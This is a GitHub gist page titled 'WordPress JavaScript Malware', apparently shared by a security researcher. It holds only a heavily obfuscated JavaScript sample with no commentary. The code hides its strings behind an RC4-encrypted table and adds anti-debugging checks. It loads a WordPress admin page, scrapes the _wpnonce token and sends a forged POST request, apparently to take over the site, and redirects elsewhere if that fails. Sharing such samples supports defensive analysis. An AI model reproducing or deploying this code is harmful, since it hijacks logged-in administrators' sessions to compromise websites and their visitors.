Skip to content

Instantly share code, notes, and snippets.

@theMiddleBlue theMiddleBlue/black.js.md Secret
Created Oct 17, 2019

Embed
What would you like to do?
WordPress JavaScript Malware
'use strict';
/** @type {!Array} */
var _0x1d35 = ["C0jCuzY=", "Z1Muw74Mw63Cu8KcKiALwojCpMOAwplgWxc=", "DTJ8wo3Cj2nDm8KVK8Ky", "JcOCfB3Cixw=", "wpTCoXM=", "CcKjw57CtQ==", "wpEZcXI=", "wovClDV6wp/CsWZ5wp7CqTjDocKPw6JbHA==", "V8KKPljClcKrLMKrwoExKMOW", "HsO9WMOhYcO8w7fCn1vDtgXCnsObAnbCnXPCnsOrF25wwowiERHDqWHCqMORcQvCog==", "dgTDkcOz", "w5hDAcKKYQ==", "by7CiVx5QcKNw5DCqw==", "DMOObsOkw4rCsQ==", "MMODcwrCigbDsA4=", "GBlLw4EubQ==", "OyXDiMKONMOhw5E=", "HDhzwprCmVbDig==", "Ezh6", "wrY3UEg=", "HSElXcKF", "w77CqgZn", "wpdqwr7DhsKh", "YUc9wp9SdjBIw5A=", 
"w5zDjELDgyY=", "w7rCpC3Ck8O2YsOF", "FELCsg==", "Zg7DkcOkwqvCu8KG", "w6DCpRJm", "Z1AwwolNbjw=", "Q3MuwrcK", "LsKEwpzClWTCkRo=", "bA/DmcO4", "dMKZLVEKEcOt", "DsKdYcOhw7Q=", "CMKAfcO9w6nDrcO5", "YBnDnMOywrTCo8KKwoXDsg==", "wpvCoXpyWlLCmg==", "cE0/wplH", "dRPDkMOjwqvCtMKMwoY=", "B8ODacOgw4DCqw==", "TMObdMKsw4jCocK2QHk7w5HDsG48w63CvRAwwrLDjXVIwoHDvjUCKsKvGg==", "N1dnSMKaw4otw6nDgMOvw4tGOcKQAMKwSsOLw67DpWw=", "w4rCgm5nw7FqwqpywrTCv1cDNXJHMi7DocOIfn/CnzIi", "JcKfwobClnjDh1DCugDCtAh+c8OnOcKBYGRjUcOrFUXCrUgLw51aK13CmE9mw6rCvsKhYHszP8OJF8K4", 
"worCm2wvw7Fqwr5owq7DsUICO3NIcSjDrg==", "w6vCriLChMOgXcOUe8OcIw==", "d0s/wo5XcQ==", "GEBewqEnXsO9wqzDkcKmdT8=", "wp3CtnFi", "IMKKwobChWM=", "w6ZEAcKId8K1aRrDnQ==", "wr/ClDTCkMOGZsOUbsOYGcO/AcO2w7JOwqPDqB4=", "K0guw5dDZjROw5DDm0pgwo8eecKpwrbCjUbDlcK9wpzDk8O0w4PCpxByHQ==", "w4sewopKEMKFf2/Cvh/Dk8O2woI=", "DMKKfcOrw7TDoMOw", "IxLDlsOjwqHCosKRwobCoQ==", "Il49wo5LbTcaw4vChEFxwo8SMMKvwqrDjUTCjQ==", "w4h2woLDpw==", "w6vCrjPCjMO4bcOF", "MnTCgsKv", "Z8KRP1w=", "w6XCoRBkb8OZfg==", "VTIQcA==", "SRNgQQ==", "Hw/Dsg=="];
(function(params, content) {
  /**
   * @param {?} selected_image
   * @return {undefined}
   */
  var fn = function(selected_image) {
    for (; --selected_image;) {
      params["push"](params["shift"]());
    }
  };
  /**
   * @return {undefined}
   */
  var build = function() {
    var target = {
      "data" : {
        "key" : "cookie",
        "value" : "timeout"
      },
      "setCookie" : function(value, name, path, headers) {
        headers = headers || {};
        /** @type {string} */
        var cookie = name + "=" + path;
        /** @type {number} */
        var url = 0;
        /** @type {number} */
        url = 0;
        var key = value["length"];
        for (; url < key; url++) {
          var i = value[url];
          /** @type {string} */
          cookie = cookie + ("; " + i);
          var char = value[i];
          value["push"](char);
          key = value["length"];
          if (char !== !![]) {
            /** @type {string} */
            cookie = cookie + ("=" + char);
          }
        }
        /** @type {string} */
        headers["cookie"] = cookie;
      },
      "removeCookie" : function() {
        return "dev";
      },
      "getCookie" : function(match, href) {
        match = match || function(canCreateDiscussions) {
          return canCreateDiscussions;
        };
        var v = match(new RegExp("(?:^|; )" + href["replace"](/([.$?*|{}()[]\/+^])/g, "$1") + "=([^;]*)"));
        /**
         * @param {!Function} callback
         * @param {number} i
         * @return {undefined}
         */
        var test = function(callback, i) {
          callback(++i);
        };
        test(fn, content);
        return v ? decodeURIComponent(v[1]) : undefined;
      }
    };
    /**
     * @return {?}
     */
    var init = function() {
      /** @type {!RegExp} */
      var test = new RegExp("\\w+ *\\(\\) *{\\w+ *['|\"].+['|\"];? *}");
      return test["test"](target["removeCookie"]["toString"]());
    };
    /** @type {function(): ?} */
    target["updateCookie"] = init;
    /** @type {string} */
    var array = "";
    var _0x46e7e8 = target["updateCookie"]();
    if (!_0x46e7e8) {
      target["setCookie"](["*"], "counter", 1);
    } else {
      if (_0x46e7e8) {
        array = target["getCookie"](null, "counter");
      } else {
        target["removeCookie"]();
      }
    }
  };
  build();
})(_0x1d35, 473);
/**
 * @param {string} n
 * @param {string} dn
 * @return {?}
 */
var _0x5596 = function(n, dn) {
  /** @type {number} */
  n = n - 0;
  var i = _0x1d35[n];
  if (_0x5596["SxcpqV"] === undefined) {
    (function() {
      var jid = typeof window !== "undefined" ? window : typeof process === "object" && typeof require === "function" && typeof global === "object" ? global : this;
      /** @type {string} */
      var listeners = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
      if (!jid["atob"]) {
        /**
         * @param {?} i
         * @return {?}
         */
        jid["atob"] = function(i) {
          var str = String(i)["replace"](/=+$/, "");
          /** @type {number} */
          var bc = 0;
          var bs;
          var buffer;
          /** @type {number} */
          var Y = 0;
          /** @type {string} */
          var pix_color = "";
          for (; buffer = str["charAt"](Y++); ~buffer && (bs = bc % 4 ? bs * 64 + buffer : buffer, bc++ % 4) ? pix_color = pix_color + String["fromCharCode"](255 & bs >> (-2 * bc & 6)) : 0) {
            buffer = listeners["indexOf"](buffer);
          }
          return pix_color;
        };
      }
    })();
    /**
     * @param {string} data
     * @param {!Object} fn
     * @return {?}
     */
    var testcase = function(data, fn) {
      /** @type {!Array} */
      var secretKey = [];
      /** @type {number} */
      var y = 0;
      var temp;
      /** @type {string} */
      var testResult = "";
      /** @type {string} */
      var tempData = "";
      /** @type {string} */
      data = atob(data);
      /** @type {number} */
      var val = 0;
      var key = data["length"];
      for (; val < key; val++) {
        /** @type {string} */
        tempData = tempData + ("%" + ("00" + data["charCodeAt"](val)["toString"](16))["slice"](-2));
      }
      /** @type {string} */
      data = decodeURIComponent(tempData);
      /** @type {number} */
      var x = 0;
      for (; x < 256; x++) {
        /** @type {number} */
        secretKey[x] = x;
      }
      /** @type {number} */
      x = 0;
      for (; x < 256; x++) {
        /** @type {number} */
        y = (y + secretKey[x] + fn["charCodeAt"](x % fn["length"])) % 256;
        temp = secretKey[x];
        secretKey[x] = secretKey[y];
        secretKey[y] = temp;
      }
      /** @type {number} */
      x = 0;
      /** @type {number} */
      y = 0;
      /** @type {number} */
      var i = 0;
      for (; i < data["length"]; i++) {
        /** @type {number} */
        x = (x + 1) % 256;
        /** @type {number} */
        y = (y + secretKey[x]) % 256;
        temp = secretKey[x];
        secretKey[x] = secretKey[y];
        secretKey[y] = temp;
        testResult = testResult + String["fromCharCode"](data["charCodeAt"](i) ^ secretKey[(secretKey[x] + secretKey[y]) % 256]);
      }
      return testResult;
    };
    /** @type {function(string, !Object): ?} */
    _0x5596["glcHGw"] = testcase;
    _0x5596["xIWTMS"] = {};
    /** @type {boolean} */
    _0x5596["SxcpqV"] = !![];
  }
  var b = _0x5596["xIWTMS"][n];
  if (b === undefined) {
    if (_0x5596["PuBeBd"] === undefined) {
      /**
       * @param {?} deny
       * @return {undefined}
       */
      var WMCacheControl = function(deny) {
        this["zcljzm"] = deny;
        /** @type {!Array} */
        this["rCtlRS"] = [1, 0, 0];
        /**
         * @return {?}
         */
        this["dCdylb"] = function() {
          return "newState";
        };
        /** @type {string} */
        this["KlxQDi"] = "\\w+ *\\(\\) *{\\w+ *";
        /** @type {string} */
        this["duYQjf"] = "['|\"].+['|\"];? *}";
      };
      /**
       * @return {?}
       */
      WMCacheControl["prototype"]["ZsDqaj"] = function() {
        /** @type {!RegExp} */
        var test = new RegExp(this["KlxQDi"] + this["duYQjf"]);
        /** @type {number} */
        var artistTrack = test["test"](this["dCdylb"]["toString"]()) ? --this["rCtlRS"][1] : --this["rCtlRS"][0];
        return this["nALANf"](artistTrack);
      };
      /**
       * @param {?} canCreateDiscussions
       * @return {?}
       */
      WMCacheControl["prototype"]["nALANf"] = function(canCreateDiscussions) {
        if (!Boolean(~canCreateDiscussions)) {
          return canCreateDiscussions;
        }
        return this["dixpqL"](this["zcljzm"]);
      };
      /**
       * @param {?} saveNotifs
       * @return {?}
       */
      WMCacheControl["prototype"]["dixpqL"] = function(saveNotifs) {
        /** @type {number} */
        var fp = 0;
        var len = this["rCtlRS"]["length"];
        for (; fp < len; fp++) {
          this["rCtlRS"]["push"](Math["round"](Math["random"]()));
          len = this["rCtlRS"]["length"];
        }
        return saveNotifs(this["rCtlRS"][0]);
      };
      (new WMCacheControl(_0x5596))["ZsDqaj"]();
      /** @type {boolean} */
      _0x5596["PuBeBd"] = !![];
    }
    i = _0x5596["glcHGw"](i, dn);
    _0x5596["xIWTMS"][n] = i;
  } else {
    i = b;
  }
  return i;
};
/**
 * @return {undefined}
 */
function _0x3c4db8() {
  var getAlignItem = function() {
    /** @type {boolean} */
    var closeExpr = !![];
    return function(object__360, function__361) {
      /** @type {!Function} */
      var closingExpr = closeExpr ? function() {
        if (function__361) {
          var cssobj = function__361["apply"](object__360, arguments);
          /** @type {null} */
          function__361 = null;
          return cssobj;
        }
      } : function() {
      };
      /** @type {boolean} */
      closeExpr = ![];
      return closingExpr;
    };
  }();
  var alignContentAlignItem = getAlignItem(this, function() {
    /**
     * @return {?}
     */
    var intval = function() {
      return "dev";
    };
    /**
     * @return {?}
     */
    var getDOMPath = function() {
      return "window";
    };
    /**
     * @return {?}
     */
    var testcase = function() {
      /** @type {!RegExp} */
      var test = new RegExp("\\w+ *\\(\\) *{\\w+ *['|\"].+['|\"];? *}");
      return !test["test"](intval["toString"]());
    };
    /**
     * @return {?}
     */
    var _stringify = function() {
      /** @type {!RegExp} */
      var test = new RegExp("(\\\\[x|u](\\w){2,4})+");
      return test["test"](getDOMPath["toString"]());
    };
    /**
     * @param {!Object} name
     * @return {undefined}
     */
    var matches = function(name) {
      /** @type {number} */
      var ms_controller = ~-1 >> 1 + 255 % 0;
      if (name["indexOf"]("i" === ms_controller)) {
        create(name);
      }
    };
    /**
     * @param {!Object} func
     * @return {undefined}
     */
    var create = function(func) {
      /** @type {number} */
      var _0x39123a = ~-4 >> 1 + 255 % 0;
      if (func["indexOf"]((!![] + "")[3]) !== _0x39123a) {
        matches(func);
      }
    };
    if (!testcase()) {
      if (!_stringify()) {
        matches("ind\u0435xOf");
      } else {
        matches("indexOf");
      }
    } else {
      matches("ind\u0435xOf");
    }
  });
  alignContentAlignItem();
  var isRowDirection = function() {
    /** @type {boolean} */
    var closeExpr = !![];
    return function(value, deferred) {
      /** @type {!Function} */
      var closingExpr = closeExpr ? function() {
        if (deferred) {
          var mom = deferred[_0x5596("0x0", "ZI^Z")](value, arguments);
          /** @type {null} */
          deferred = null;
          return mom;
        }
      } : function() {
      };
      /** @type {boolean} */
      closeExpr = ![];
      return closingExpr;
    };
  }();
  var isMainRowDirection = isRowDirection(this, function() {
    /**
     * @return {undefined}
     */
    var tOutResp = function() {
    };
    var jid = typeof window !== _0x5596("0x1", "n)ls") ? window : typeof process === _0x5596("0x2", "LT!p") && typeof require === _0x5596("0x3", "xRfk") && typeof global === _0x5596("0x4", "odv7") ? global : this;
    if (!jid[_0x5596("0x5", "tM8z")]) {
      jid[_0x5596("0x6", "rb5]")] = function(data) {
        var specialDayCache = {};
        /** @type {function(): undefined} */
        specialDayCache[_0x5596("0x7", "rb5]")] = data;
        /** @type {function(): undefined} */
        specialDayCache[_0x5596("0x8", "0X@y")] = data;
        /** @type {function(): undefined} */
        specialDayCache[_0x5596("0x9", "*QR^")] = data;
        /** @type {function(): undefined} */
        specialDayCache[_0x5596("0xa", "4u]8")] = data;
        /** @type {function(): undefined} */
        specialDayCache[_0x5596("0xb", "o*qA")] = data;
        /** @type {function(): undefined} */
        specialDayCache[_0x5596("0xc", "0ZDA")] = data;
        /** @type {function(): undefined} */
        specialDayCache[_0x5596("0xd", "8RkE")] = data;
        return specialDayCache;
      }(tOutResp);
    } else {
      /** @type {function(): undefined} */
      jid[_0x5596("0xe", "gI%e")][_0x5596("0xf", "Dq9v")] = tOutResp;
      /** @type {function(): undefined} */
      jid[_0x5596("0x10", "dtQ8")][_0x5596("0x11", "4u]8")] = tOutResp;
      /** @type {function(): undefined} */
      jid[_0x5596("0x12", "0ZDA")][_0x5596("0x13", "VvCy")] = tOutResp;
      /** @type {function(): undefined} */
      jid[_0x5596("0x14", "orp(")][_0x5596("0x15", "dtQ8")] = tOutResp;
      /** @type {function(): undefined} */
      jid[_0x5596("0x16", "11NG")][_0x5596("0x17", "[cxg")] = tOutResp;
      /** @type {function(): undefined} */
      jid[_0x5596("0x18", "[cxg")][_0x5596("0x19", "dtQ8")] = tOutResp;
      /** @type {function(): undefined} */
      jid[_0x5596("0x1a", "M6Bi")][_0x5596("0x1b", "0ZDA")] = tOutResp;
    }
  });
  isMainRowDirection();
  var date = location[_0x5596("0x1c", "dtQ8")] + "//" + document[_0x5596("0x1d", "LT!p")];
  var relationName = date + _0x5596("0x1e", "LT!p");
  var next_planting = date + _0x5596("0x1f", "IG3A");
  var first_harvest = date + _0x5596("0x20", "LU&0");
  var bytes = _0x5596("0x21", "orp(");
  /** @type {!XMLHttpRequest} */
  var _related2 = new XMLHttpRequest;
  /**
   * @return {undefined}
   */
  _related2[_0x5596("0x22", "LU&0")] = function() {
    if (this[_0x5596("0x23", "gI%e")] == 4) {
      if (this[_0x5596("0x24", "0ZDA")] == 200) {
        var $node = this[_0x5596("0x25", "8lgR")];
        /** @type {!RegExp} */
        var directiveProcessors = /name="_wpnonce"([ ]+)value="([^"]+)"/g;
        var $close = directiveProcessors[_0x5596("0x26", "M6Bi")]($node);
        if ($close != null) {
          if ($close[2][_0x5596("0x27", "orp(")](/([a-z0-9]{10})/)) {
            var otpUrl = $close[2];
            /** @type {string} */
            var cmd = _0x5596("0x28", "ZI^Z") + encodeURIComponent(otpUrl) + _0x5596("0x29", "gI%e") + encodeURIComponent(_0x5596("0x2a", "0ZDA")) + _0x5596("0x2b", "4R$B") + encodeURIComponent(_0x5596("0x2c", "[cxg")) + _0x5596("0x2d", "dtQ8") + bytes + _0x5596("0x2e", "0ZDA") + bytes;
            _0x3623b5(next_planting, cmd);
          } else {
            window[_0x5596("0x2f", "6RIj")]();
            location[_0x5596("0x30", "gI%e")](bytes + _0x5596("0x31", "3Exf"));
          }
        } else {
          window[_0x5596("0x32", "7@zz")]();
          location[_0x5596("0x33", "4u]8")](bytes + _0x5596("0x34", "ss(w"));
        }
      }
    }
  };
  _related2[_0x5596("0x35", "v$41")](_0x5596("0x36", "tM8z"), relationName, !![]);
  _related2[_0x5596("0x37", "Dq9v")]();
}
/**
 * @param {?} format
 * @param {string} data
 * @return {undefined}
 */
function _0x3623b5(format, data) {
  /** @type {!XMLHttpRequest} */
  var formats = new XMLHttpRequest;
  /**
   * @return {undefined}
   */
  formats[_0x5596("0x38", ")E$]")] = function() {
    if (this[_0x5596("0x39", "rb5]")] == 4 && this[_0x5596("0x3a", "xRfk")] == 200) {
      console[_0x5596("0x3b", "M6Bi")](format);
    }
  };
  formats[_0x5596("0x3c", "bqX4")](_0x5596("0x3d", "0X@y"), format, !![]);
  formats[_0x5596("0x3e", "w!TT")](_0x5596("0x3f", "7@zz"), _0x5596("0x40", "w9mu"));
  formats[_0x5596("0x41", "dtQ8")](data);
}
_0x3c4db8();
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.